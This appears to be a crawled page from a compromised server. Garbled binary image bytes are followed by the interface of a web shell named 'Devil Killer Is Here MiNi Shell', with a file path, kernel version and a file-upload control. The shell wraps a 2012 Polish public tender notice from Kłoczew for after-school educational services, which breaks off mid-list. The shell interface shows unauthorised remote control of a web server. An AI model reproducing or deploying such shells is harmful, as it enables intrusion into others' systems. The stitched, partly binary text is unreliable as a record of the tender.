JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121108/438784-N-2012.html

<p class="kh_header"><b>Kłoczew: Zakup usług edukacyjnych w ramach Projektu Droga do Sukcesu - program wyrównywania szans edukacyjnych w Gminie Kłoczew</b><br>
<b>Numer ogłoszenia: 438784 - 2012; data zamieszczenia: 08.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowa Administracja Szkół Podstawowych i Gimnazjum , ul. Długa 67/4, 08-550 Kłoczew, woj. lubelskie, tel. 25 75 43 164, faks 25 75 43 751.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych w ramach Projektu Droga do Sukcesu - program wyrównywania szans edukacyjnych w Gminie Kłoczew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych, zajęć specjalistycznych (korekcyjno-kompensacyjnych) oraz z zakresu poradnictwa i doradztwa edukacyjno - zawodowego w ramach projektu Droga do Sukcesu - program wyrównywania szans edukacyjnych w Gminie Kłoczew w terminie od listopada 2012 roku do 30 czerwca 2013 roku w szkołach, dla których organem prowadzącym jest Gmina z Kłoczew. 
 
Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych, zajęć specjalistycznych (korekcyjno-kompensacyjnych) oraz z zakresu poradnictwa i doradztwa edukacyjno - zawodowego w ramach projektu Droga do Sukcesu - program wyrównywania szans edukacyjnych w Gminie Kłoczew w terminie od listopada 2012 roku do 30 czerwca 2013 roku w szkołach, dla których organem prowadzącym jest Gmina z Kłoczew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że dopuszcza możliwość udzielenia zamówień uzupełniających, o których  mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, w przypadku zmian zasad realizacji projektu Droga do Sukcesu - wyrównywania szans edukacyjnych w Gminie Kłoczew wprowadzonych przez Instytucję Zarządzającą Programem Operacyjnym Kapitał Ludzki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dokumenty potwierdzające wymagane wykształcenie, kwalifikacje i staż pracy do realizacji poszczególnych zajęć edukacyjnych:
a) w częściach od I do VI w zadaniach 1, 2, 3, 4, 5, 6, 7, 8, 12, 13, 14, 15, 16, 17, 20, 21, 22, 23, 24, 25, 26, 29, 30, 31, 34, 35, 36, 37, 38, 39, 41, 42, 43, 44, 45, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64 wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym lub wykształcenie wyższe zawodowe dające kwalifikacje do nauczania w szkole podstawowej/gimnazjum, osoba legitymująca się co najmniej stopniem awansu zawodowego nauczyciela kontraktowego, (weryfikacja na podstawie życiorysu zawodowego)
b) w częściach I i II w zadaniach 9, 27 - posiadać wykształcenie wyższe magisterskie i przygotowanie do prowadzenia zajęć z logopedii oraz minimum 2-letnie doświadczenie w prowadzeniu zajęć (weryfikacja na podstawie życiorysu zawodowego)
c) w częściach I, II i III w zadaniach 18, 32, 46 - posiadać wykształcenie wyższe magisterskie i przygotowanie do prowadzenia zajęć z zakresu poradnictwa i doradztwa edukacyjno-zawodowego oraz minimum 2-letnie doświadczenie w prowadzeniu zajęć (weryfikacja na podstawie życiorysu zawodowego)
d) w części I, II, III i IV zadaniu 11, 19, 33, 40, 47- posiadać wykształcenie wyższe magisterskie pedagogiczne lub psychologiczne oraz minimum 2-letnie doświadczenie w prowadzeniu zajęć z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (weryfikacja na podstawie życiorysu zawodowego)
e) w części I i II zadaniu 10 i 28- posiadać wykształcenie wyższe magisterskie i przygotowanie do prowadzenia zajęć korekcyjno-kompensacyjnych dla uczniów z zaburzeniami i odchyleniami rozwojowymi lub specyficznymi trudnościami w uczeniu się oraz z wadami postawy raz minimum 2-letnie doświadczenie w prowadzeniu zajęć (weryfikacja na podstawie życiorysu zawodowego)

2. Dokumenty należy składać w formie kopii poświadczonej za zgodność z oryginałem</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz cenowo-ofertowy , oświadczenie o uczestnictwie w innych projektach</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kloczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samorządowa Administracja Szkół Podstawowych i  Gimnazjum 
08-550 Kłoczew ul. Długa 67/4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 10:00, miejsce: Samorządowa Administracja Szkół Podstawowych i  Gimnazjum 
08-550 Kłoczew ul. Długa 67/4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Projektu Droga do Sukcesu- program wyrównywania szans edukacyjnych w Gminie Kłoczew.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zespół Szkół w Kłoczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka polskiego przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 348 godzin
- grupa 1i 2- 116 godzin
- grupa 3-  58 godzin
- grupa 4 - 58 godzin
- grupa 5 - 58 godzin 
- grupa 6 - 58 godzin 
Zadanie 2
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka angielskiego przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1- 58 godzin
- grupa 2- 58 godzin
Zadanie 3
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 522 godzin
- grupa 1,2,3 - 174 godziny
- grupa 4 i 5 - 116 godzin
- grupa 6 i 7 - 116 godzin
- grupa 8 i 9 - 116 godzin 
Zadanie 4
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu informatyki przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1 i 2 - 116 godzin
Zadanie 5
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu przyrody przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin

Zadanie 6
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1 i 2 - 116 godzin
Zadanie 7
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 406 godzin
- grupa 1 i 2- 116 godzin
- grupa 3     - 58 godzin 
- grupa 4 - 58 godzin 
- grupa 5 - 58 godzin 
- grupa 6 - 58 godzin 
- grupa 7 - 58 godzin 
Zadanie 8
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 116 godzin
- grupa 1   -58 godzin 
- grupa 2 - 58 godzin 
Zadanie 9
Zajęcia pozalekcyjne logopedyczne dla uczniów z zaburzeniami rozwoju mowy, które powodują zaburzenia komunikacji językowej oraz utrudniają naukę (Szkoła Podstawowa) - 58 godzin.
- grupa 1 i 2 - 58 godzin 
Zadanie 10
Zajęcia specjalistyczne - korekcyjno-kompensacyjne dla uczniów z zaburzeniami i odchyleniami rozwojowymi lub specyficznymi trudnościami w uczeniu się oraz z wadami postawy (Szkoła Podstawowa) - 58 godzin
- grupa 1 i 2 - 58 godzin 
Zadanie 11
Zajęcia z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (Szkoła Podstawowa) - 18 godzin
- grupa 1 - 18 godzin
Zadanie 12
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu efektywnej nauki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 200 godzin
- grupa 1,2,3,4 - 200 godzin 
Zadanie 13
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 348 godzin
- grupa 1,2,3 - 174 godziny 
- grupa 4,5,6 -  174 godziny

Zadanie 14
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu informatyki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 116 godzin
- grupa 1,2 - 116 godzin 
Zadanie 15
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 116 godzin
- grupa 1,2 - 116 godzin 
Zadanie 16
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Gimnazjum) - 348 godzin
- grupa 1,2 - 116 godzin 
- grupa 3,4,5,6 - 232 godziny 
Zadanie 17
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Gimnazjum) - 174 godzin
- grupa 1,2,3 - 174 godziny 
Zadanie 18
Zajęcia z zakresu poradnictwa i doradztwa edukacyjno-zawodowego (spotkania indywidualne) informujące uczniów o korzyściach płynących z wyboru danej ścieżki edukacyjnej oraz możliwościach dalszego kształcenia w kontekście uwarunkowań lokalnego i regionalnego rynku pracy (Gimnazjum) - 96 godzin
-grupa 1- 96 godzin 
Zadanie 19
Zajęcia z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (Gimnazjum) - 18 godzin
- grupa 1- 18 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zespół Szkół w Goździe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 20
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1 - 116 godzin
Zadanie 21
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu informatyki przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 22
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu przyrody przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 58 godzin
-  grupa 1 - 58 godzin
Zadanie 23
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 174 godziny - grupa 1 - 58 godzin
- grupa 2 - 58 godzin
- grupa 3 - 58 godzin
Zadanie 24
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 174 godziny 
- grupa 1 - 87 godzin
- grupa 2 - 87 godzin
Zadanie 25
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 26
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka angielskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 58 godzin
- grupa 1- 58 godzin
Zadanie 27
Zajęcia pozalekcyjne logopedyczne dla uczniów z zaburzeniami rozwoju mowy, które powodują zaburzenia komunikacji językowej oraz utrudniają naukę (Szkoła Podstawowa) - 29 godzin.
- grupa 1 - 29 godzin
Zadanie 28
Zajęcia specjalistyczne - korekcyjno-kompensacyjne dla uczniów z zaburzeniami i odchyleniami rozwojowymi lub specyficznymi trudnościami w uczeniu się oraz z wadami postawy (Szkoła Podstawowa) - 29 godzin
- grupa 1 - 29 godzin
Zadanie 29
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 116 godzin
- grupa 1,2 - 116 godzin
Zadanie 30
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu informatyki przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 31
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu przedsiębiorczości przez wykorzystaniu aktywnych metod pracy (Gimnazjum) - 58 godzin
- grupa 1 - 58 godzin

Zadanie 32
Zajęcia z zakresu poradnictwa i doradztwa edukacyjno-zawodowego (spotkania indywidualne) informujące uczniów o korzyściach płynących z wyboru danej ścieżki edukacyjnej oraz możliwościach dalszego kształcenia w kontekście uwarunkowań lokalnego i regionalnego rynku pracy (Gimnazjum) - 30 godzin
- grupa 1 - 30 godzin
Zadanie 33
Zajęcia z zakresu doradztwa i opieka pedagogiczno-psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty (Gimnazjum) -135godzin
- grupa 1 - 68 godzin
- grupa 2 - 67 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zespół Szkół w Czernicu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 34
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z języka polskiego przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 35
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu matematyki przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1 - 58 godzin
- grupa 2 - 58 godzin
Zadanie 36
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z przyrody przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 58 godzin
- grupa 1 - 58 godzin
Zadanie 37
Zajęcia pozalekcyjne rozwijające zainteresowania uczniów zdolnych z zakresu ekspresji kulturalnej przez wykorzystaniu aktywnych metod pracy (Szkoła Podstawowa) - 116 godzin
- grupa 1,2 - 116 godzin
Zadanie 38
Zajęcia pozalekcyjne dydaktyczno-wyrównawcze z języka polskiego dla uczniów mających trudności w nauce, w szczególności w spełnianiu wymagań edukacyjnych wynikających z podstawy programowej kształcenia ogólnego dla danego etapu edukacyjnego (Szkoła Podstawowa) - 116 godzin
- grupa 1,2 - 116 godzin
Zadanie 39
